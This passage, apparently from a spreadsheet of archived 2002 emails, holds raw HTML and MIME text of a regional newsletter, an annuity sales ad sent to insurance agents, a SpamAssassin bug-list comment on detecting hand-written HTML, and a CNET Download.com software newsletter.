 &lt;/FONT&gt;&lt;/STRONG&gt;&lt;/SPAN&gt;&lt;/P&gt;
 &lt;P class=3DMsoBodyText2 style=3D"MARGIN: 0in 0in 0pt"&gt;&lt;SPAN&gt;&lt;FONT=20
 color=3D#008000&gt;&lt;FONT color=3D#000000&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/SPAN&gt;&amp;nbsp;&lt;/P&gt;
 &lt;P class=3DMsoBodyText2 style=3D"MARGIN: 0in 0in 0pt"&gt;&lt;SPAN&gt;&lt;FONT=20
 color=3D#008000&gt;&lt;STRONG&gt;&lt;FONT color=3D#000000&gt;This weeks movie trivia =
 questions is=20
 posted on our homepage...&lt;/FONT&gt; &lt;/STRONG&gt;&lt;/FONT&gt;&lt;A=20
 href=3D"http://www.allthingsnewengland.com"&gt;&lt;FONT=20
 color=3D#008000&gt;&lt;STRONG&gt;www.allthingsnewengland.com&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/A&gt;&lt;/=
 SPAN&gt;&lt;/P&gt;
 &lt;P class=3DMsoBodyText2=20
 style=3D"MARGIN: 0in 0in 0pt"&gt;&lt;SPAN&gt;&lt;STRONG&gt;&lt;/STRONG&gt;&lt;/SPAN&gt;&amp;nbsp;&lt;/P&gt;
 &lt;P class=3DMsoBodyText2 style=3D"MARGIN: 0in 0in 0pt"&gt;&lt;SPAN&gt;&lt;STRONG&gt;Have =
 a great=20
 weekend everyone!&lt;/STRONG&gt;&lt;/SPAN&gt;&lt;/P&gt;
 &lt;P class=3DMsoBodyText2=20
 style=3D"MARGIN: 0in 0in 0pt"&gt;&lt;SPAN&gt;&lt;STRONG&gt;&lt;/STRONG&gt;&lt;/SPAN&gt;&amp;nbsp;&lt;/P&gt;
 &lt;P class=3DMsoBodyText2=20
 style=3D"MARGIN: 0in 0in =
 0pt"&gt;&lt;SPAN&gt;&lt;STRONG&gt;Sincerely,&lt;/STRONG&gt;&lt;/SPAN&gt;&lt;/P&gt;
 &lt;P class=3DMsoBodyText2=20
 style=3D"MARGIN: 0in 0in 0pt"&gt;&lt;SPAN&gt;&lt;STRONG&gt;&lt;/STRONG&gt;&lt;/SPAN&gt;&amp;nbsp;&lt;/P&gt;
 &lt;P class=3DMsoBodyText2 style=3D"MARGIN: 0in 0in 0pt"&gt;&lt;SPAN&gt;&lt;STRONG&gt;Joe, =
 Liz, Jenna=20
 and Maggie&lt;/STRONG&gt;&lt;/SPAN&gt;&lt;/P&gt;
 &lt;P class=3DMsoBodyText2 style=3D"MARGIN: 0in 0in 0pt"&gt;&lt;SPAN&gt;&lt;FONT=20
 color=3D#008000&gt;&lt;STRONG&gt;All Things New =
 England&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/SPAN&gt;&lt;/P&gt;
 &lt;P class=3DMsoBodyText2 style=3D"MARGIN: 0in 0in 0pt"&gt;&lt;SPAN&gt;&lt;EM&gt;&lt;FONT=20
 size=3D1&gt;&lt;STRONG&gt;"We bring New England to =
 you!"&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/EM&gt;&lt;/SPAN&gt;&lt;/P&gt;
 &lt;P class=3DMsoBodyText2 style=3D"MARGIN: 0in 0in 0pt"&gt;&lt;SPAN&gt;&lt;A=20
 href=3D"http://www.allthingsnewengland.com"&gt;&lt;FONT=20
 color=3D#008000&gt;&lt;STRONG&gt;www.allthingsnewengland.com&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/A&gt;&lt;/=
 SPAN&gt;&lt;/P&gt;
 &lt;P class=3DMsoBodyText2 style=3D"MARGIN: 0in 0in =
 0pt"&gt;&lt;SPAN&gt;&lt;/SPAN&gt;&amp;nbsp;&lt;/P&gt;
 &lt;P class=3DMsoBodyText2=20
 style=3D"MARGIN: 0in 0in =
 0pt"&gt;&lt;/o:p&gt;&lt;/SPAN&gt;&amp;nbsp;&lt;/P&gt;&lt;/DIV&gt;&lt;/BODY&gt;&lt;/HTML&gt;
 ------=_NextPart_000_0027_01C24A78.6D4710A0--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: We Dare You to Find a Better Annuity
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_1CDC19_01C25366.4B57F3A0
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: quoted-printable
  We dare you...
  Try to find a better annuity!
 =20
   - 5.40% Guaranteed for 6 Years=0A=
 - 6 Year Surrender Charge=0A=
 - 5% Agent
 Commission up to age 80=09
 Call today for more information!
  800-888-7641 ext. 103
 - or -
 Please fill out the form below for more information	=20
 Name:	 	  =09
 E-mail:	 	=20
 Phone:	 	=20
 City:	 	 State:	 	=20
  	    =09
 =20
  PMG Financial Services
 *5.40% for deposits of $100,000 and up, 5.25% interest for deposits
 totalling $25,000-$99,999.	=20
 We don't want anyone to receive our mailings who does not wish to
 receive them. This is a professional communication sent to insurance
 professionals. To be removed from this mailing list, DO NOT REPLY to
 this message. Instead, go here: http://www.insuranceiq.com/optout
 &lt;http://www.insuranceiq.com/optout/&gt;=20
 Legal Notice &lt;http://www.insiq.com/legal.htm&gt;=20
 ------=_NextPart_000_1CDC19_01C25366.4B57F3A0
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;We Dare You to Find a Better Annuity&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#666666" text=3D"#000000"&gt;
 &lt;font face=3D"Arial, Helvetica, sans-serif"&gt;=20
 &lt;table width=3D"550" border=3D"1" align=3D"center" cellpadding=3D"0" =
 cellspacing=3D"0" bordercolor=3D"#000000" bgcolor=3D"#FFFFFF"&gt;
   &lt;tr&gt;=20
     &lt;td&gt;
       &lt;img src=3D"http://iiq.us/images/pmg/20020822-101.gif" alt=3D"We =
 dare you..." width=3D"550" height=3D"55"&gt;&lt;br&gt;
       &lt;img src=3D"http://iiq.us/images/pmg/20020822-102.jpg" alt=3D"Try =
 to find a better annuity!" width=3D"550" height=3D"47"&gt;&lt;br&gt;
       &lt;img src=3D"http://iiq.us/images/pmg/20020822-103.jpg" =
 width=3D"550" height=3D"248"&gt;=20
       &lt;table width=3D"100%" cellpadding=3D"2" cellspacing=3D"2" =
 border=3D"0" bgcolor=3D"#ffffff"&gt;
         &lt;tr&gt;=20
           &lt;td&gt;&lt;img src=3D"http://iiq.us/images/pmg/20020822-201.gif" =
 width=3D"32" height=3D"142"&gt;&lt;img =
 src=3D"http://iiq.us/images/pmg/20020822-202.gif" alt=3D"- 5.40% =
 Guaranteed for 6 Years&amp;#10;- 6 Year Surrender Charge&amp;#10;- 5% Agent =
 Commission up to age 80" width=3D"508" height=3D"142"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;
             &lt;b&gt;&lt;font size=3D"2"&gt;Call today for more information!&lt;br&gt;
             &lt;img src=3D"http://iiq.us/images/pmg/20020822-3.gif" =
 alt=3D"800-888-7641 ext. 103" width=3D"535" height=3D"115"&gt;&lt;br&gt;
             - or -&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
             &lt;table width=3D"95%" border=3D"1" cellpadding=3D"0" =
 cellspacing=3D"0" bordercolor=3D"#000000"&gt;
               &lt;tr&gt;=20
                 &lt;form method=3D"post" =
 action=3D"http://65.217.159.103/response/response.asp"&gt;
                   &lt;td&gt;=20
                     &lt;table width=3D"100%" border=3D"0" align=3D"center" =
 cellpadding=3D"2" cellspacing=3D"0" =
 background=3D"http://iiq.us/images/pmg/20020822-5.gif" =
 bgcolor=3D"#ffffff"&gt;
                       &lt;tr&gt;=20
                         &lt;td colspan=3D"5" align=3D"center"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;Please fill out the form below for more =
 information&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;Name:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt;&lt;input type=3D"text" =
 name=3D"contactname" size=3D"50"&gt;&lt;/td&gt;
                         &lt;td rowspan=3D"5" valign=3D"middle" =
 align=3D"center"&gt;&lt;img src=3D"http://iiq.us/images/q3.gif" width=3D"43" =
 height=3D"50"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;E-mail:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt;&lt;input type=3D"text" =
 name=3D"email" size=3D"50"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;Phone:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt;&lt;input type=3D"text" =
 name=3D"phone" size=3D"50"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;City:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td width=3D"30%"&gt;&lt;input type=3D"text" =
 name=3D"city" size=3D"20"&gt;&lt;/td&gt;
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;State:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td width=3D"20%"&gt;&lt;input type=3D"text" =
 name=3D"state" size=3D"2"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&amp;nbsp;&lt;/td&gt;
                         &lt;td width=3D"30%" colspan=3D'3'&gt;=20
                           &lt;input type=3D"submit" name=3D"btnsubmit" =
 value=3D"Submit"&gt;
                           &lt;input type=3D"hidden" =
 name=3D"hdnRecipientTxt" value=3D"rhock@pmgsecurities.com"&gt;
                           &lt;input type=3D"hidden" name=3D"hdnSubjectTxt" =
 value=3D"PMG Dare Ad Inquiry"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                     &lt;/table&gt;
                   &lt;/td&gt;
                 &lt;input type=3D'hidden' name=3D'SentTo' value=3D'304704'&gt;
 &lt;/form&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &lt;b&gt;&lt;font size=3D"2"&gt;&lt;img =
 src=3D"http://iiq.us/images/pmg/20020822-4.gif" alt=3D"PMG Financial =
 Services" width=3D"416" height=3D"142"&gt;=20
             &lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td&gt;&lt;font size=3D"1"&gt;*5.40% for deposits of $100,000 and up, =
 5.25% interest for deposits totalling $25,000-$99,999.&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
 		&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;=20
     &lt;td width=3D"100%" bgcolor=3D"#cccccc" align=3D"center"&gt;
 			&lt;p&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"1"&gt;We=20
 			don't want anyone to receive our mailings who does not=20
 			wish to receive them. This is a professional communication=20
 			sent to insurance professionals. To be removed from this mailing=20
 			list, &lt;b&gt;DO NOT REPLY&lt;/b&gt; to this message. Instead, go here: &lt;a =
 href=3D"http://www.insuranceiq.com/optout/"&gt;=20
 			http://www.insuranceiq.com/optout&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;center&gt;
   &lt;a href=3D"http://www.insiq.com/legal.htm"&gt;&lt;font size=3D"1" =
 face=3D"Arial, Helvetica, sans-serif"&gt;Legal Notice &lt;/font&gt;&lt;/a&gt;=20
 &lt;/center&gt;
 &lt;/font&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_1CDC19_01C25366.4B57F3A0--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAdev] [Bug 777] tests to find hand-written HTML
</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.hughes-family.org/bugzilla/show_bug.cgi?id=777
 ------- Additional Comments From daniel@roe.ch  2002-08-28 09:15 -------
 3. usage of &lt;p&gt; just like &lt;br&gt; (ie. without &lt;/p&gt;) which is obsolete
    (not sure whether some mailers still produce such broken html)
 4. tag argument values sometimes enclosed in "", sometimes not
 5. colour args without # in front of hex rgb code
 6. colour args with non-6-digit rgb code (typo)
 7. onMouseOver et al in nonconsistent case throughout the document
 Mind, those are just ideas. I'm pretty sure some or even most of them
 are not working in practice, but they might be worth checking out.
 ------- You are receiving this mail because: -------
 You are on the CC list for the bug, or are watching someone who is.
 -------------------------------------------------------
 This sf.net email is sponsored by: Jabber - The world's fastest growing 
 real-time communications platform! Don't just IM. Build it in! 
 http://www.jabber.com/osdn/xim
 _______________________________________________
 Spamassassin-devel mailing list
 Spamassassin-devel@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/spamassassin-devel
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: This Week: FileSystem, AppletFile, PHP Master Editor
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;Download Dispatch: Tools for Software Developers&lt;/TITLE&gt;
 &lt;META http-equiv=Content-Type content="text/html; charset=windows-1252"&gt;
 &lt;META content="MSHTML 5.50.4616.200" name=GENERATOR&gt;&lt;/HEAD&gt;
 &lt;BODY bgColor=#eeeeee&gt;
 &lt;CENTER&gt;
 &lt;!-- header --&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width=612 bgColor=#ffffff border=0&gt;
 &lt;TBODY&gt;
 &lt;TR vAlign=top&gt;
 &lt;TD width=442 colSpan=4&gt;&lt;IMG height=60 alt="Download Dispatch - Tools
 for Software Developers"
 src="http://download.cnet.com/i/dl/scr/442_downldHDR_softwr.gif"
 width=442&gt;&lt;BR&gt;
 	&lt;TABLE cellSpacing=0 cellPadding=0 width=442 bgColor=#ffcc00 border=0&gt;
 	&lt;TBODY&gt;
 	&lt;TR&gt;&lt;TD bgColor=#000000 colSpan=3&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif" width=1&gt;&lt;/TD&gt;&lt;/TR&gt;
 	&lt;TR&gt;&lt;TD width=1 bgColor=#000000 rowSpan=2&gt;&lt;IMG height=10
 src="http://www.cnet.com/b.gif" width=1&gt;&lt;/TD&gt;
 	&lt;TD width=10 rowSpan=2&gt;&lt;IMG height=10
 src="http://www.cnet.com/b.gif" width=1&gt;&lt;/TD&gt;
 	&lt;TD width=430&gt;&lt;IMG height=10 src="http://www.cnet.com/b.gif"
 width=1&gt;&lt;/TD&gt;&lt;/TR&gt;
 	&lt;TR&gt;&lt;TD bgColor=#000000&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif" width=1&gt;&lt;/TD&gt;&lt;/TR&gt;
 	&lt;/TBODY&gt;
 	&lt;/TABLE&gt;
 &lt;/TD&gt;
 &lt;td width=160 rowspan=2&gt;&lt;img src="http://www.cnet.com/i/nl/dd_b.gif"
 width=160 height=18&gt;&lt;br&gt;
 &lt;table width=160 cellpadding=0 cellspacing=0 border=0&gt;
 &lt;tr&gt;&lt;td align=center bgcolor="#eeeeee"&gt;&lt;img
 src="http://www.cnet.com/Ads/Media/Images/ad10-dk.gif" width=120
 height=10&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ad --&gt;
 &lt;iframe src="http://www.zdnet.com/include/ads/ifc/RGROUP=2560" scrolling="no" frameborder="0" hspace="0" vspace="0" height="600" width="160" marginheight="0" marginwidth="0"&gt;
 &lt;script language="JavaScript" src="http://www.zdnet.com/include/ads/js/RGROUP=2560"&gt;
 &lt;/script&gt;
 &lt;/iframe&gt;
 &lt;!-- ad --&gt;
 &lt;/A&gt;&lt;BR&gt;&amp;nbsp;&lt;BR&gt;
 &lt;!-- right column content --&gt;
 &lt;!-- featured collections --&gt;
 &lt;IMG height=20 src="http://a.r.tv.com/cnet.1d/i/nl/shw/rhc_featcol.gif"
 width=150&gt;&lt;BR&gt;
 &lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=b3-QHzxQYKTqe_pq4uAE64qDAwrPGFR" &gt;ActiveX controls
 &lt;BR&gt;&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;
 &lt;FONT face="arial, helvetica" size=-1&gt;
 We've selected our top programs that handle transparent GIF
    files, offer prebuilt ActiveX controls, and edit hex code
    to get you up and running.
 &lt;BR&gt;&lt;/FONT&gt;
 &lt;P&gt;&lt;/P&gt;
 &lt;!-- end featured collections --&gt;
 &lt;!-- &lt;P&gt;&lt;a href="http://clickthru.online.com/Click?q=c8-2lPnQWOzdDxti4JMKE-nFr99H29R" &gt;&lt;IMG height=40
 src="http://catchup.cnet.com/catchup_btn2.gif" width=160 border=0&gt;&lt;/a&gt;
 &lt;P&gt; --&gt;
 	&lt;!-- updates &amp; drivers --&gt;
 	&lt;IMG height=20 alt="Software Updates"
 src="http://www.cnet.com/i/nl/dl/rhc_up.gif" width=150&gt;&lt;BR&gt;
 	&lt;TABLE cellSpacing=0 cellPadding=2 width=150 border=0&gt;
 	&lt;TBODY&gt;
 	&lt;TR&gt;&lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 	&lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=dd-tpm0QzWd3D_ulv-GZP85eXsJh-uR" &gt;Anfy Java 2.0&lt;/A&gt;&lt;/B&gt;&lt;BR&gt;
 Apply magical effects to your Web-bound images.
 &lt;P&gt;
 	&lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=f2-OZVTQUwWCeOtgWz0pvVdi5Z7edsR" &gt;ActiveFile 2.3
 &lt;/A&gt;&lt;/B&gt;&lt;BR&gt;
 Add file-handling capabilities to your Active Server Pages.&lt;P&gt;
 	&lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=07-HqCzI5rq9ThuuLDiqzUbrvLkiDZR" &gt;UltraEdit-32 9.1&lt;/A&gt;&lt;/B&gt;&lt;BR&gt;
 Edit text, HTML, or hex code, with a comprehensive support for a programmer's needs.&lt;P&gt;
 	&lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=1c-cs_iIFr43mOSOr2n9kgGa2oXqGdR" &gt;SQL*Lite 2.6&lt;/A&gt;&lt;/B&gt;&lt;BR&gt;
 Run up to five simultaneous SQL queries with this tool for Oracle and MySQL.&lt;P&gt;
 	&lt;!-- end updates &amp; drivers --&gt;
 &lt;!-- shopper upgrades --&gt;
 &lt;IMG height=20 alt="Software
 Upgrades"src="http://a.r.tv.com/cnet.1d/i/nl/cu/rhc_shopper.gif"
 width=150&gt;&lt;BR&gt;
 &lt;TABLE cellSpacing=0 cellPadding=2 width=150 border=0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD colSpan=2&gt;&lt;FONT face="Arial, Helvetica, sans-serif"
 size=2&gt;&lt;B&gt;Software Upgrades:&lt;/B&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;/TD&gt;&lt;/TR&gt;
  				 &lt;TR vAlign=top&gt;
 				                  &lt;TD&gt;&lt;FONT face="arial, helvetica"
 				                    size=-1&gt;&lt;B&gt;&amp;nbsp;1.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 				                  &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 				 &lt;a href="http://clickthru.online.com/Click?q=31-V_YRIjMsD0pMqVnyLxjkqVAXXbcR" &gt;
 				 ZoneAlarm Pro 3.0&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 				                &lt;TR vAlign=top&gt;
 				                  &lt;TD&gt;&lt;FONT face="arial, helvetica"
 				                    size=-1&gt;&lt;B&gt;&amp;nbsp;2.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 				                  &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 				 &lt;a href="http://clickthru.online.com/Click?q=46-19zwInpDSNEbj9Ca1cN0535V0YiR" &gt;
 				 Norton AntiVirus 2002&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 				                &lt;TR vAlign=top&gt;
 				                  &lt;TD&gt;&lt;FONT face="arial, helvetica"
 				                    size=-1&gt;&lt;B&gt;&amp;nbsp;3.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 				                  &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 				 &lt;a href="http://clickthru.online.com/Click?q=5c-BnjPIZnPbl7b5LQ53xlZk0f-IonR" &gt;
 				 AdSubtract Pro 2.5&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 				                &lt;TR vAlign=top&gt;
 				                  &lt;TD&gt;&lt;FONT face="arial, helvetica"
 				                    size=-1&gt;&lt;B&gt;&amp;nbsp;4.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 				                  &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 				 &lt;a href="http://clickthru.online.com/Click?q=71-GwdUIEZcfHFszRxqwuBXvl3NU2rR" &gt;
 				 Microsoft Windows XP - Professional&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 				               &lt;TR vAlign=top&gt;
 				 		                  &lt;TD&gt;&lt;FONT face="arial, helvetica"
 				                    size=-1&gt;&lt;B&gt;&amp;nbsp;5.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 				                  &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 				 &lt;a href="http://clickthru.online.com/Click?q=86-8fH1QCJonn1kpdmSjaeTldfVpfRR" &gt;
 				 Nero Burning ROM 5.5&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 				                &lt;TR vAlign=top&gt;
 				                  &lt;TD&gt;&lt;FONT face="arial, helvetica"
 				                    size=-1&gt;&lt;B&gt;&amp;nbsp;6.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 				                  &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 				                  &lt;a href="http://clickthru.online.com/Click?q=9b-7-TFQSIo2pCEzLu0dAVJ9PZAKTFR" &gt;
 				 Reason 2.0&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 				                    &lt;TR vAlign=top&gt;
 				                  &lt;TD&gt;&lt;FONT face="arial, helvetica"
 				 	                       size=-1&gt;&lt;B&gt;&amp;nbsp;7.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 				 	                     &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 				 	                     &lt;a href="http://clickthru.online.com/Click?q=b0-NZmfQQJr-Surf_fdxQMKtNX8PQ9R" &gt;
 				 Microsoft Windows XP - Home Edition&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 				               &lt;TR vAlign=top&gt;
 				 		                  &lt;TD&gt;&lt;FONT face="arial, helvetica"
 				 		                    size=-1&gt;&lt;B&gt;&amp;nbsp;8.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 				 		                  &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 				 		                  &lt;a href="http://clickthru.online.com/Click?q=c5-8BcDQzOaF-dK3Y0zSROUJEymxquR" &gt;
 				 QuickBooks Pro 2002&lt;/A&gt; &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 				                &lt;TR vAlign=top&gt;
 				                  &lt;TD&gt;&lt;FONT face="arial, helvetica"
 				                    size=-1&gt;&lt;B&gt;&amp;nbsp;9.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 				                  &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 				 &lt;a href="http://clickthru.online.com/Click?q=da-dT8jQUPq_nGS5s2bjsMVKpv3DxsR" &gt;
 				 Adobe Photoshop 7.0&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 				                &lt;TR vAlign=top&gt;
 				                  &lt;TD&gt;&lt;FONT face="arial, helvetica"
 				 size=-1&gt;&lt;B&gt;10.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 				                 &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 				 &lt;a href="http://clickthru.online.com/Click?q=ef-04uYQmkHvF_F_BDqBxDVAmoBamZR" &gt;
 WinZip 8.1&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;p&gt;
 &lt;TR&gt;
 &lt;p&gt;&lt;TD colSpan=2&gt;
 &lt;P&gt;&lt;FONT face="Arial, Helvetica, sans-serif" size=-2&gt;Find a complete
 list of the 50 most popular software products at &lt;a href="http://clickthru.online.com/Click?q=04-k9W0IFQXFQ6Wpd-98BbBL7kOi_dR" &gt;&lt;B&gt;CNET
 Shopper.com&lt;/B&gt;&lt;/A&gt;.&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;p&gt;
 &lt;!--  end shopper upgrades --&gt;
 	&lt;/TR&gt;
 	&lt;/TBODY&gt;
 	&lt;/TABLE&gt;
 &lt;/P&gt;&lt;/TD&gt;
 &lt;TD width=9 rowSpan=2&gt;&lt;IMG height=60
 src="http://www.cnet.com/i/nl/dd_c.gif" width=9&gt;&lt;BR&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width=9 border=0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD bgColor=#000000&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif" width=9&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD bgColor=#ffcc00&gt;&lt;IMG height=10
 src="http://www.cnet.com/b.gif" width=1&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD bgColor=#000000&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif"
 width=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;
 &lt;TD width=1 bgColor=#000000 rowSpan=2&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width=1 border=0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD bgColor=#eeeeee&gt;&lt;IMG height=60
 src="http://www.cnet.com/b.gif"
 width=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR vAlign=top&gt;
 &lt;TD width=1 bgColor=#000000&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif" width=1&gt;&lt;/TD&gt;
 &lt;TD width=10 bgColor=#ffcc00&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif" width=10&gt;&lt;/TD&gt;
 &lt;TD width=1 bgColor=#000000&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif" width=1&gt;&lt;/TD&gt;
 &lt;TD width=430 bgColor=#ffffff&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width=430 bgColor=#ffffef border=0&gt;
 &lt;TBODY&gt;
 &lt;TR vAlign=top&gt;
 &lt;TD rowSpan=2 width=10&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif"
 width=10&gt;&lt;/TD&gt;
 &lt;TD colSpan=3&gt;
 &lt;!-- date --&gt;
 &lt;FONT face="arial, helvetica"
 size=-2&gt;July 10, 2002 &lt;/FONT&gt;
 &lt;!-- /date --&gt;
 &lt;P&gt;&lt;FONT face="arial, helvetica"
 size=-1&gt;&lt;FONT color=#333333
 size=3&gt;&lt;B&gt;Greetings from Download.com!&lt;/B&gt;&lt;/FONT&gt;&lt;p&gt;
 If you're developing Windows applications in an
 ActiveX-compatible environment (which includes most major ones
 such as Visual Basic and C++), it's time you started taking
 advantage of prefab programming components. An amazing array of
 controls are out there, with more arriving at Download.com
 every day. This week, we've collected the top programs that
 handle transparent GIF files, offer prebuilt ActiveX controls,
 and edit hex code to get you up and running.&lt;p&gt;
 Also this week, we've got two really useful ActiveX entries:
 &lt;a href="http://clickthru.online.com/Click?q=1a-y6ZkIlXH6wJ46AOd5q0_HZB17WsR" &gt;FileSystem 1.2&lt;/a&gt; and &lt;a href="http://clickthru.online.com/Click?q=2f-hYaFIqnzAaETrfOP26D_8gaZjMZR" &gt;AppSecureX 2.9&lt;/a&gt;. FileSystem gives you access
 to drives, folders, and I/O operations; and AppSecureX adds
 serial number and shareware-type functionality to your
 applications.&lt;p&gt;
 Becky Waring&lt;br&gt;
 Contributing Editor, CNET Download.com&lt;p&gt;
 &lt;/FONT&gt;&lt;/P&gt;
 &lt;/TD&gt;&lt;TD width=10&gt;&lt;IMG height=1 src="http://www.cnet.com/b.gif" width=10&gt;&lt;/TD&gt;
